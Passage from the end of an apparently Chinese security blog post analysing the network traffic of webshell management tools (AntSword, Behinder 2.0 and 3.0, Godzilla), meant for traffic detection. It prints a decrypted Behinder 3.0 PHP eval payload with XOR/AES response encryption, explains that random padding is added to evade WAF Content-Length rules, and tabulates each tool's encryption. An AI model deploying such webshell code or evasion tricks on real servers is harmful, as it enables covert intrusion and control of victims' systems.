    3Mn1yNMtoZViV5wotQHPJtwwj0F4b2lyToNK7LfdUnN7zmyQFfx/zaiGwUHg+8SlXZemCLBkDIvxiBIGd6bgOEiZtNpn6YmnWiiaCBNbXkC5JWFTARrD8lCOCQ4ZVFjsJFDaAOwzinbqne/oYuNwWjQvKM9ii2RE/b+Gc+ya2f4+OIDU2Wk/QSIL7GOAoyaUYZSq4bL2wmX5RnP1Lbf7S+TAy3K7JPruBiZeZGC/ay14vUj4+IgmNHwEAzWl3DNIsL1yhH4Do5FI8HwZpG5XnrZwpKdFIEgN4GKmcDODTdO2pj8DVXCwes3m+v/wRykVd++xsex2EkGn9p0SgL+GpXlGg6OlQscedjdgBXv15UyPfJude5BJv+j7cEF7zpdtyAnFYCSqiRX+XD7DNsIUVbU+oamjVwZCgr4L+bbRvs1NfjV6iKKs65VTnlSIbCArJv/w+axR9Gc7Jt9v/GBKckbRjefZGqx7UTKDMahYEBgrwpXrii28q/UerEq/VKFKKeHQuovmpvlx8CblMBkG+rHmhQrP7QVJuzSOUbwdWZpbhys2bufqT6hyOjsu/0sSmHdrzvlZgkRsnsNK0Kv56sesEx9AiwuvgxMh5gAi86uAfhQISoEU5jZNs/T0LiJksv6xddHsDoKSwx+2s74jiNNFh9p0AmUdDloXXvRrfJvCdfaTHnkDEOH6BcSyZj9r53ZKiQUHPh7Sd13x/bk7zcKrUubSplf5cFLc+7m2nSWkXM1Ei7GVkZKBvKorowWkuS0katSgEt3WN00g95HyDfGdxZyUIthJ9hIETiP81O67weGqjFraZfXQUuOHNibydSrZTj/1La6OqSSHoAVnghH9TbYzM4lDdppSZJ1j5eWx8CVn+E8LeCyeROLhKix+P9yJh72FbLOoMFvCurzarkbYZrmQ7Qb0R1oOt2rKNFxY8/itqOSZdk/d2lFkZeT8sbzLmdMQBdSvP/WlvhRdgoYhdkYMfH+2YBJnLuuGgCaXJ0Ky0PpM6+076t6rbiQQQeZNXIMXEBI0Tj3HW3pUzfujkNq9eH0+MYndahOkMTmGSsloL4KLXxuzW2UHOd0giJV1LCFDyY+DlZ/h6mezAzXn7U8m+4uk+5hW3MlS1c3Z5seYa5YUvr/0fJlpswhcRNJCW8cqYNkrvhkx8qDodL6/3cjmjhqQPJEzJJGG6l0hF7vDByXs+2zE63uNlwhgrIDJgbiGOX3Ds6FaIiuCcQ/ZUtqA9W8sAQCdge6P+zJ1OoKVkNCpOhUb3e22MUXxtWH+1BdoR+S5aSN6NjcM4pKQrwXJ4xyV59kI9PUAjavw7DK+/Pf2wUFWCT2YVbObz+NLTxQ2r8QswTWp0kVLMSNIzOwbtWjUy+S9UAAPIVHPKmXRzplprChlH0wL9uCUO8L2htsaRM0Fpd7M8vrDyQ==

    解密后

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    assert|eval(base64_decode('

    @error_reporting(0);
    function main($content)
    {
    	$result = array();
    	$result["status"] = base64_encode("success");
        $result["msg"] = base64_encode($content);
        $key = $_SESSION['k'];
        echo encrypt(json_encode($result),$key);
    }

    function encrypt($data,$key)
    {
    	if(!extension_loaded('openssl'))
        	{
        		for($i=0;$i<strlen($data);$i++) {
        			 $data[$i] = $data[$i]^$key[$i+1&15]; 
        			}
    			return $data;
        	}
        else
        	{
        		return openssl_encrypt($data, "AES128", $key);
        	}
    }$content="S3F0TTlUQjVsSkRGNnFlSHU2dEt0c0RzdzZlUWpWaUJobzRCMW9id0NlSzd2SzlEWFBaMENsSXpJVXh5aTFwMWxNa3VSd1k5YVJUQWZnNWkzS0JPQ3hsbWRpdGpHZkQ4dnlsMk9SenZ1T3hxZE5FOEVGaEs1TXF0S1hHcFZxSVIyeWJTY25weHZDWW93SnZ0";$content=base64_decode($content);
    main($content);

    // 解密第一次发送的数据查看,这里有一个参数为 $content 这个变量名称和里面的内容为随机生成的, 目的是为了绕过 $Content-Length ,这个已经在冰蝎2.0中已经被加入了Waf的检测规则当中,所以在冰蝎3.0当中用数据填充的方式绕过。

    '));

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    HTTP/1.1 200 OK
    Date: Thu, 08 Sep 2022 07:47:16 GMT
    Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02
    X-Powered-By: PHP/5.6.9
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Set-Cookie: PHPSESSID=j39c0oi2abaghm0b8h5ab7pmj3; path=/
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Transfer-Encoding: chunked
    Content-Type: text/html; charset=UTF-8

    mAUYLzmqn5QPDkyI5lvSp0fjiBu1e7047YjfczwY6j42REBdjeI0ap/e4pavYx6svt2i0v0ZERdkwhGaPZ/VBGvP1Cw29Ic+DnwBtTxWec7IuOA8jFdHrujhbw+4sln0433D5aFZLZUmEL6LuWpl2caVaTnmhPj7pWvWPGafD8CsHA1kTk/zy6s6ik5IMIWJkDVTI3vlb4zy2y5Qomp0RDOjsYaeRkwQerekW7A0sZcCm4suP8/BO3J/W6pOaBUhYUKjVIB/zsvKBsBgz1pMpUMBLFSU8B1RApobdh5rzEsKseQXvj4HKy+3HwF72AKQ

哥斯拉

后门程序

总结

AntSword:

requests response
base64等方式 明文

冰蝎2.0:

requests response
开启Openssl扩展-动态密钥aes加密 aes加密+base64
未开启Openssl扩展-异或 异或+base64

冰蝎3.0:

requests response
开启Openssl扩展-静态密钥aes加密 aes加密+base64
未开启Openssl扩展-异或 异或+base64

哥斯拉:

requests response
php的为base64+异或+base64 异或+base64+脏字符
jsp的为Base64+AES aes+base64+脏字符

参考文章

Publish date:September 8th 2022, 5:47:19 pm

Update date:September 8th 2022, 5:48:27 pm

License:本文采用知识共享署名-非商业性使用 4.0 国际许可协议进行许可

CATALOG
  1. 1. 常见Webshell连接工具流量分析
    1. 1.0.1. 蚁剑
      1. 1.0.1.0.1. 网站后门一句话
      2. 1.0.1.0.2. wireshark抓包
      3. 1.0.1.0.3. 连接过程分析
      4. 1.0.1.0.4. 命令执行分析
  2. 1.0.2. 冰蝎2.0流量分析
    1. 1.0.2.0.1. 后门
    2. 1.0.2.0.2. wireshark抓包
    3. 1.0.2.0.3. 连接过程分析
  • 1.0.3. 冰蝎3.0流量分析
    1. 1.0.3.0.1. 后门代码
    2. 1.0.3.0.2. wireshark抓包分析
    3. 1.0.3.0.3. 流量分析
  • 1.0.4. 哥斯拉
    1. 1.0.4.0.1. 后门程序
  • 1.0.5. 总结
    • Total : 15
    2023
    2022
    黑科技 docker java安全 linux 恶意代码 二进制 攻防 java框架 web安全 windows windows编程 虚拟化 windows安全 反调试
    黑科技 docker java安全 内核 恶意代码 红蓝攻防 windows逆向 web安全 编程 虚拟化 虚拟化 内核安全 内核 内核